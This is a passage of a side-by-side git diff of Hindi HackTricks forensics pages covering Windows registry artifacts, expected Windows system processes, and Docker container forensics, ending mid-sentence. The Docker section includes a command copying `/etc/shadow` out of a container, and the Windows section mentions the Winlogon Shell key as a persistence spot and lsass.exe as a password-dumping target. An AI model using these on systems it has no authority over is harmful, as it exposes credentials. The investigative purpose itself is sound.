- **शेलबैग्स** न केवल फ़ोल्डर दृश्य के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अनमोल हैं, अन्य माध्यमों के माध्यम से स्पष्ट न होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए। - **शेलबैग्स** न केवल फ़ोल्डर दृश्यों के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अमूल्य हैं, अन्य साधनों के माध्यम से स्पष्ट नहीं होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए।
### USB जानकारी और फोरेंसिक्स ### USB सूचना और फोरेंसिक्स
- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस का पता लगाने में मदद कर सकते हैं, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से एक डिवाइस को जोड़ सकते हैं। - USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस थे, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से डिवाइस को जोड़ सकते हैं।
### वॉल्यूम सीरियल नंबर ### वॉल्यूम सीरियल नंबर
- **वॉल्यूम सीरियल नंबर** एक फ़ाइल सिस्टम के विशिष्ट उदाहरण का पता लगाने के लिए महत्वपूर्ण हो सकता है, जिसे विभिन्न उपकरणों पर फ़ाइल का मूल स्रोत स्थापित करने के लिए फोरेंसिक स्थितियों में उपयोगी होता है - **वॉल्यूम सीरियल नंबर** फ़ाइल सिस्टम के विशिष्ट उदाहरण का ट्रैकिंग के लिए महत्वपूर्ण हो सकता है, जिसे फ़ोरेंसिक स्थितियों में उपयोगी होता है जहां फ़ाइल का मूल स्थान विभिन्न उपकरणों के बीच स्थापित किया जाना चाहिए
### **शटडाउन विवरण** ### **शटडाउन विवरण**
- शटडाउन समय और गणना (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखे जाते हैं - शटडाउन समय और गिनती (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखा जाता है
### **नेटवर्क कॉन्फ़िगरेशन** ### **नेटवर्क कॉन्फ़िगरेशन**
- विस्तृत नेटवर्क इंटरफेस जानकारी के लिए, **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`** का संदर्भ दें। - विस्तृत नेटवर्क इंटरफेस जानकारी के लिए, **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`** का संदर्भ दें।
- पहली और आखिरी नेटवर्क कनेक्शन समय, व्यूपीएन कनेक्शन सहित, विभिन्न पथों में लॉग किए गए हैं **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**। - पहली और आखिरी नेटवर्क कनेक्शन समय, VPN कनेक्शन सहित, **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** में विभिन्न पथों के तहत लॉग किए गए हैं
### **साझा फोल्डर** ### **साझा फोल्डर**
- साझा फोल्डर और सेटिंग्स **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं। - साझा फोल्डर और सेटिंग **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं।
### **स्वचालित रूप से शुरू होने वाले प्रोग्राम** ### **स्वचालित रूप से शुरू होने वाले प्रोग्राम**
- पथ जैसे **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** और `Software\Microsoft\Windows\CurrentVersion` के तहत समान प्रविष्टियाँ विस्तार से विवरणित करती हैं जो स्टार्टअप पर चलाने के लिए सेट किए गए प्रोग्राम हैं। - पथ जैसे **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** और `Software\Microsoft\Windows\CurrentVersion` के तहत समान प्रविष्टियाँ विस्तार से विवरणित करती हैं जो स्टार्टअप पर चलाने के लिए सेट किए गए प्रोग्राम हैं।
@ -70,11 +70,11 @@ HackTricks का समर्थन करने के अन्य तरी
### **खोजें और टंकित पथ** ### **खोजें और टंकित पथ**
- एक्सप्लोरर खोज और टंकित पथ रजिस्ट्री में ट्रैक किए जाते हैं **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** के तहत WordwheelQuery और TypedPaths के लिए। - एक्सप्लोरर खोज और टंकित पथ रजिस्ट्री में ट्रैक किए जाते हैं **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** के तहत WordwheelQuery और TypedPaths के लिए।
### **हाल के दस्तावेज़ और ऑफिस फ़ाइलें** ### **हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें**
- हाल के दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में। - हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में।
### **हाल ही में उपयोग किए गए (MRU) आइटम** ### **हाल ही में उपयोग किए गए (MRU) आइटम**
- MRU सूचियाँ, हाल के फ़ाइल पथ और कमांड दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहित होती हैं। - MRU सूचियाँ, हाल ही में फ़ाइल पथ और कमांड को दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहत होती हैं।
### **उपयोगकर्ता गतिविधि ट्रैकिंग** ### **उपयोगकर्ता गतिविधि ट्रैकिंग**
- उपयोगकर्ता सहायत - यूज़र असिस्ट

View file

@ -1,54 +1,55 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपने हैकिंग ट्रिक्स साझा करें।
</details> </details>
{% endhint %}
## smss.exe ## smss.exe
**सत्र प्रबंधक**.\ **सेशन मैनेजर**.\
त्र 0 **csrss.exe** और **wininit.exe** (**ओएस सेवाएं**) को शुरू करता है जबकि सत्र 1 **csrss.exe** और **winlogon.exe** (**उपयोगकर्ता सत्र**) को शुरू करता है। हालांकि, आपको प्रक्रिया पेड़तल में उस बाइनरी का केवल एक प्रक्रिया देखनी चाहिए जिसके बच्चे नहीं हैं। ेशन 0 **csrss.exe** और **wininit.exe** (**ओएस सेवाएं**) को शुरू करता है जबकि सेशन 1 **csrss.exe** और **winlogon.exe** (**उपयोगकर्ता सत्र**) को शुरू करता है। हालांकि, आपको प्रक्रिया पेड़तल में उस बाइनरी का केवल एक प्रक्रिया देखनी चाहिए जिसके बच्चे नहीं हैं।
इसके अलावा, 0 और 1 के अलावा सत्रों का मतलब है कि RDP सत्र हो रहे हैं। इसके अलावा, 0 और 1 के अलावा सेशन का मतलब हो सकता है कि RDP सत्र हो रहे हैं।
## csrss.exe ## csrss.exe
**क्लाइंट/सर्वर रन सबसिस्टम प्रक्रिया**.\ **क्लाइंट/सर्वर रन सबसिस्टम प्रक्रिया**.\
यह **प्रक्रियाएँ** और **धागे** प्रबंधित करता है, अन्य प्रक्रियाओं के लिए **Windows API** उपलब्ध कराता है और भी **ड्राइव अक्षर** मैप करता है, **temp फ़ाइलें** बनाता है, और **शटडाउन प्रक्रिया** को संभालता है। यह **प्रक्रियाएँ** और **धागे** प्रबंधित करता है, अन्य प्रक्रियाओं के लिए **Windows API** उपलब्ध कराता है और भी **ड्राइव लेटर्स मैप** करता है, **temp फ़ाइलें बनाता है**, और **शटडाउन प्रक्रिया** को संभालता है।
त्र 0 में एक **चल रहा है और सत्र 1 में एक और है** (इसलिए प्रक्रिया पेड़तल में **2 प्रक्रियाएँ** हैं)। एक और नया सत्र प्रति नई सत्र में बनाया जाता है। ेशन 0 में एक **चल रहा है और सेशन 1 में एक और है** (तो प्रक्रिया पेड़ताल में **2 प्रक्रियाएँ** हैं)। एक और नया सत्र प्रति एक और बनाया जाता है।
## winlogon.exe ## winlogon.exe
**Windows लॉगऑन प्रक्रिया**.\ **विंडोज लॉगऑन प्रक्रिया**.\
यह उपयोगकर्ता **लॉगऑन**/**लॉगऑफ** के लिए जिम्मेदार है। यह **logonui.exe** को उपयोगकर्ता नाम और पासवर्ड के लिए पूछने के लिए लॉन्च करता है और फिर **lsass.exe** को उन्हें सत्यापित करने के लिए बुलाता है। यह उपयोगकर्ता **लॉगऑन**/**लॉगऑफ** के लिए जिम्मेदार है। यह **logonui.exe** को उपयोगकर्ता नाम और पासवर्ड के लिए पूछने के लिए लॉन्च करता है और फिर उन्हें सत्यापित करने के लिए **lsass.exe** को कॉल करता है।
फिर यह **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** में उपयुक्तित **Userinit** कुंजी के साथ निर्दिष्ट **userinit.exe** को लॉन्च करता है। फिर यह **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** में उपयुक्तित **Userinit** कुंजी के साथ निर्धारित **userinit.exe** को लॉन्च करता है।
इसके अतिरिक्त, पिछला रजिस्ट्री में **explorer.exe** को **Shell कुंजी** में होना चाहिए या यह एक **मैलवेयर स्थायित्व विधि** के रूप में दुरुपयोग किया जा सकता है। इसके अलावा, पिछला रजिस्ट्री में **explorer.exe** को **शैल कुंजी** में होना चाहिए या यह एक **मैलवेयर स्थायित्व विधि** के रूप में दुरुपयोग किया जा सकता है।
## wininit.exe ## wininit.exe
**Windows प्रारंभीकरण प्रक्रिया**. \ **विंडोज प्रारंभीकरण प्रक्रिया**. \
यह सत्र 0 में **services.exe**, **lsass.exe**, और **lsm.exe** को लॉन्च करता है। केवल 1 प्रक्रिया होनी चाहिए। यह सत्र 0 में **services.exe**, **lsass.exe**, और **lsm.exe** को लॉन्च करता है। केवल 1 प्रक्रिया होनी चाहिए।
## userinit.exe ## userinit.exe
**उपयोगकर्ता प्रारंभिकरण एप्लिकेशन**.\ **उपयोगकर्ता लॉगऑन एप्लिकेशन**.\
**ntduser.dat in HKCU** को लोड करता है और **उपयोगकर्ता पर्यावरण** को प्रारंभ करता है और **लॉगऑन स्क्रिप्ट** और **GPO** को चलाता है। **ntduser.dat in HKCU** को लोड करता है और **उपयोगकर्ता पर्यावरण** को प्रारंभ करता है और **लॉगऑन स्क्रिप्ट्स** और **GPO** को चलाता है।
यह **explorer.exe** को लॉन्च करता है। यह **explorer.exe** को लॉन्च करता है।
@ -56,49 +57,49 @@ HackTricks का समर्थन करने के अन्य तरी
## lsm.exe ## lsm.exe
**स्थानीय सत्र प्रबंधक**.\ **स्थानीय सत्र प्रबंधक**.\
यह smss.exe के साथ काम करता है ताकि उपयोगकर्ता सत्रों को प्रबंधित कर सके: लॉगऑन/लॉगऑफ, शैल शुरू, डेस्कटॉप लॉक/अनलॉक, आदि। यह smss.exe के साथ काम करता है ताकि उपयोगकर्ता सत्रों को प्रबंधित कर सके: लॉगऑन/लॉगऑफ, शैल प्रारंभ, डेस्कटॉप लॉक/अनलॉक, आदि।
W7 के बाद lsm.exe को एक सेवा में रूपांतरित किया गया था (lsm.dll)। W7 के बाद lsm.exe को एक सेवा में रूपांतरित किया गया था (lsm.dll)।
W7 में केवल 1 प्रक्रिया होनी चाहिए और उनमें से एक DLL चलाने वाली सेवा W7 में केवल 1 प्रक्रिया होनी चाहिए और उनमें से एक सेवा DLL चल रही होगी
## services.exe ## services.exe
**सेवा नियंत्रण प्रबंधक**.\ **सेवा नियंत्रण प्रबंधक**.\
यह **सेवाएं** जो **ऑटो-स्टार्ट** और **ड्राइवर** के रूप में विन्यस्त की गई हैं को **लोड** करता है। यह **सेवाएं** जो **ऑटो-स्टार्ट** और **ड्राइवर्स** के रूप में कॉन्फ़िगर की गई हैं को **लोड** करता है।
यह **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** और बहुत कुछ के मूल प्रक्रिया है। यह **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** और बहुत कुछ के मूल प्रक्रिया है।
सेवाएं `HKLM\SYSTEM\CurrentControlSet\Services` में परिभाषित हैं और यह प्रक्रिया सेवा जानकारी का मेमोरी में डेटाबेस बनाए रखती है जिसे sc.exe द्वारा पूछा जा सकता है। सेवाएं `HKLM\SYSTEM\CurrentControlSet\Services` में परिभाषित हैं और यह प्रक्रिया सेवा जानकारी का मेमोरी में डेटाबेस बनाए रखती है जिसे sc.exe द्वारा पूछा जा सकता है।
ध्यान दें कि **कुछ सेवाएं** अपने आप में एक **अपनी प्रक्रिया में चल रही होंगी** और अन्य **svchost.exe प्रक्रिया को साझा करेंगी**। ध्यान दें कि **कुछ सेवाएं** अपने खुद के **प्रक्रिया में चल रही होंगी** और दूसरे **svchost.exe प्रक्रिया को साझा कर रही होंगी**।
केवल 1 प्रक्रिया होनी चाहिए। केवल 1 प्रक्रिया होनी चाहिए।
## lsass.exe ## lsass.exe
**स्थानीय सुरक्षा प्राधिकरण उपसिस्टम**.\ **स्थानीय सुरक्षा प्राधिकरण सबसिस्टम**.\
यह उपयोगकर्ता **प्रमाणीकरण** के लिए जिम्मेदार है और **सुरक्षा टोकन** बनाता है। यह `HKLM\System\CurrentControlSet\Control\Lsa` में स्थित प्रमाणीकरण पैकेज का उपयोग करता है। यह उपयोगकर्ता **प्रमाणीकरण** के लिए जिम्मेदार है और **सुरक्षा टोकन** बनाता है। यह `HKLM\System\CurrentControlSet\Control\Lsa` में स्थित प्रमाणीकरण पैकेज का उपयोग करता है।
यह **सुरक्षा घटना लॉग** में लिखता है और केवल 1 प्रक्रिया होनी चाहिए। यह **सुरक्षा घटना लॉग** में लिखता है और केवल 1 प्रक्रिया होनी चाहिए।
ध्यान रखें कि इस प्रक्रिया को पासवर्ड डंप करने के लिए अधिक हमले किए जाते हैं ध्यान रखें कि यह प्रक्रिया पासवर्ड डंप करने के लिए अधिक आक्रामक है
## svchost.exe ## svchost.exe
**सामान्य सेवा होस्ट प्रक्रिया**.\ **जेनेरिक सेवा होस्ट प्रक्रिया**.\
यह एक साझा प्रक्रिया में कई DLL सेवाओं को होस्ट करता है। यह एक साझा प्रक्रिया में कई DLL सेवाओं को होस्ट करता है।
आम तौर पर, आपको देखने को मिलेगा कि **svchost.exe** `-k` ध्वज के साथ लॉन्च होा है। यह रजिस्ट्री **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** में एक कुंजी होगी जिसमें -k में उल्लिखित तर्क होगा जो एक ही प्रक्रिया में लॉन्च करने के लिए सेवाएं होंगी। आम तौर पर, आपको देखने को मिलेगा कि **svchost.exe** `-k` ध्वज के साथ लॉन्च हो रहा है। यह रजिस्ट्री **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** में एक कुंजी होगी जिसमें -k में उल्लिखित तर्क के साथ एक कुंजी होगी जिसमें एक ही प्रक्रिया में लॉन्च करने के लिए सेवाएं होंगी।
उदाहरण के लिए: `-k UnistackSvcGroup` लॉन्च करेगा: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` उदाहरण के लिए: `-k UnistackSvcGroup` लॉन्च करेगा: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
यदि **ध्वज `-s`** भी उपयोग किया जाता है तो svchost से कहा जाता है कि इस तर्क में केवल निर्दिष्ट सेवा को ही लॉन्च करें। यदि **ध्वज `-s`** भी उपयोग किया जाता है तो svchost से कहा जाता है कि इस तर्क में उल्लिखित सेवा को केवल लॉन्च करें।
`svchost.exe` कई प्रक्रियाएँ होंगी। यदि इनमें से कोई भी **`-k` ध्वज का उपयोग नहीं कर रहा है**, तो यह बहुत संदेहाजनक है। यदि आपको पता चलता है कि **services.exe माता प्रक्रिया नहीं है**, तो यह भी बहुत संदेहाजनक है। `svchost.exe` कई प्रक्रियाएँ होंगी। यदि इनमें से कोई भी **`-k` ध्वज का उपयोग नहीं कर रहा है**, तो यह बहुत संदेहास्पद है। यदि आपको पता चलता है कि **services.exe माता प्रक्रिया नहीं है**, तो यह भी बहुत संदेहास्पद है।
## taskhost.exe ## taskhost.exe
@ -114,9 +115,9 @@ W8 में इसे taskhostex.exe कहा जाता है और W10
**केवल 1** प्रक्रिया प्रति लॉग ऑन उपयोगकर्ता के लिए उत्पन्न होनी चाहिए। **केवल 1** प्रक्रिया प्रति लॉग ऑन उपयोगकर्ता के लिए उत्पन्न होनी चाहिए।
यह **userinit.exe** से चलाया जाता है जिसे समाप्त किया जाना चाहिए, इसलिए इस प्रक्रिया के लिए कोई **माता** प्रक्रिया नहीं दिखनी चाहिए। यह **userinit.exe** से चलाया जाता है जिसे समाप्त कर दिया जाना चाहिए, इसलिए इस प्रक्रिया के लिए **कोई माता** दिखाई नहीं देना चाहिए।
# दुर्भाग्यपूर्ण प्रक्रियाओं को पकड़ना # दुर्भाग्यपूर्ण प्रक्रियाओं को पकड़ना
* क्या यह अप * क्या

View file

@ -1,22 +1,23 @@
# डॉकर फोरेंसिक्स # डॉकर फोरेंसिक्स
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
## कंटेनर संशोध ## कंटेनर मोडिफिकेश
कुछ संदेह है कि किसी डॉकर कंटेनर को कंप्रोमाइज किया गया था: कुछ संदेह है कि किसी डॉकर कंटेनर में हमला हुआ था:
```bash ```bash
docker ps docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
@ -36,12 +37,12 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI
A /var/lib/mysql/mysql/general_log.CSV A /var/lib/mysql/mysql/general_log.CSV
... ...
``` ```
पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया** है।\ पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया**।\
अगर आपको लगता है कि कुछ दिलचस्प फ़ाइल जैसे कि `/etc/shadow` में संशोधन किया गया है, तो आप इसे कंटेनर से डाउनलोड करके जांच के लिए कर सकते हैं: अगर आपको लगता है कि कोई दिलचस्प फ़ाइल जैसे `/etc/shadow` में संशोधन किया गया है तो आप इसे कंटेनर से डाउनलोड करके जांच सकते हैं कि क्या कोई हानिकारक गतिविधि है।
```bash ```bash
docker cp wordpress:/etc/shadow. docker cp wordpress:/etc/shadow.
``` ```
आप एक नए कंटेनर चलाकर इसकी मूल फ़ाइल को निकालकर इसे मूल फ़ाइल के साथ **तुलना कर सकते हैं**: आप एक नए कंटेनर को चला कर इसकी तुलना **मूल फ़ाइल से कर सकते हैं** और उससे फ़ाइल निकाल सकते हैं:
```bash ```bash
docker run -d lamp-wordpress docker run -d lamp-wordpress
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
@ -51,16 +52,16 @@ diff original_shadow shadow
```bash ```bash
docker exec -it wordpress bash docker exec -it wordpress bash
``` ```
## छवि संशोधन ## छवियों की संशोधन
जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में) तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग कर सकते हैं **संशोधनों का सारांश निकालने** के लिए: जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में), तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग कर सकते हैं **संशोधनों की सारांश** निकालने के लिए:
```bash ```bash
docker save <image> > image.tar #Export the image to a .tar file docker save <image> > image.tar #Export the image to a .tar file
container-diff analyze -t sizelayer image.tar container-diff analyze -t sizelayer image.tar
container-diff analyze -t history image.tar container-diff analyze -t history image.tar
container-diff analyze -t metadata image.tar container-diff analyze -t metadata image.tar
``` ```
फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संशयित फ़ाइलों की खोज कर सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं: फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संशयात्मक फ़ाइलों की खोज कर सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं:
```bash ```bash
tar -xf image.tar tar -xf image.tar
``` ```
@ -70,18 +71,18 @@ tar -xf image.tar
```bash ```bash
docker inspect <image> docker inspect <image>
``` ```
आप यहाँ एक सारांश **परिवर्तन के इतिहास** प्राप्त कर सकते हैं: आप निम्नलिखित के साथ एक सारांश **परिवर्तन का इतिहास** प्राप्त कर सकते हैं:
```bash ```bash
docker history --no-trunc <image> docker history --no-trunc <image>
``` ```
आप एक छवि से एक **डॉकरफ़ाइल भी उत्पन्न कर सकते हैं** इसके साथ: आप एक छवि से एक **डॉकरफ़ाइल भी बना सकते हैं** इसके साथ:
```bash ```bash
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
``` ```
### डाइव ### डाइव
डॉकर इमेजेस में जोड़ी गई/संशोधित फ़ाइलें खोजने के लिए आप [**डाइव**](https://github.com/wagoodman/dive) (इसे [**रिलीज़**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) से डाउनलोड करें) उपयोग कर सकते हैं: डॉकर इमेजेस में जोड़ी गई/संशोधित फ़ाइलें खोजने के लिए आप [**डाइव**](https://github.com/wagoodman/dive) (इसे [**रिलीज़**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) से डाउनलोड करें) उपयोगी है:
```bash ```bash
#First you need to load the image in your docker repo #First you need to load the image in your docker repo
sudo docker load < image.tar 1 sudo docker load < image.tar 1
@ -90,10 +91,10 @@ Loaded image: flask:latest
#And then open it with dive: #And then open it with dive:
sudo dive flask:latest sudo dive flask:latest
``` ```
यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** रंग जोड़ी गई को और **पीला** रंग संशोधित को दर्शाता है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस** को फोल्डर को संक्षिप्त/खोलने के लिए करें। यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** जोड़ी गई है और **पीला** संशोधित कर दिया गया है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस**ा उपयोल्डर को संक्षिप्त/खोलने के लिए करें।
इसके साथ आप इमेज के विभिन्न स्टेज के सामग्री तक पहुंच नहीं पाएंगे। इसे करने के लिए आपको **प्रत्येक लेयर को डीकंप्रेस करना और उस तक पहुंचना** होगा।\ इसके साथ आप इमेज के विभिन्न स्टेज के सामग्री तक पहुंच नहीं पाएंगे। इसे करने के लिए आपको **प्रत्येक लेयर को डीकंप्रेस करना और उस तक पहुंचना** होगा।\
आप इमेज से सभी लेयर्स को डीकंप्रेस कर सकते हैं जिसे इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां से इमेज को डीकंप्रेस किया गया था कार्यान्वित करके: आप इमेज से सभी लेयर को डीकंप्रेस कर सकते हैं ज इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां इमेज को डीकंप्रेस किया गया था क्रियान्वित करके:
```bash ```bash
tar -xf image.tar tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
@ -102,4 +103,4 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don
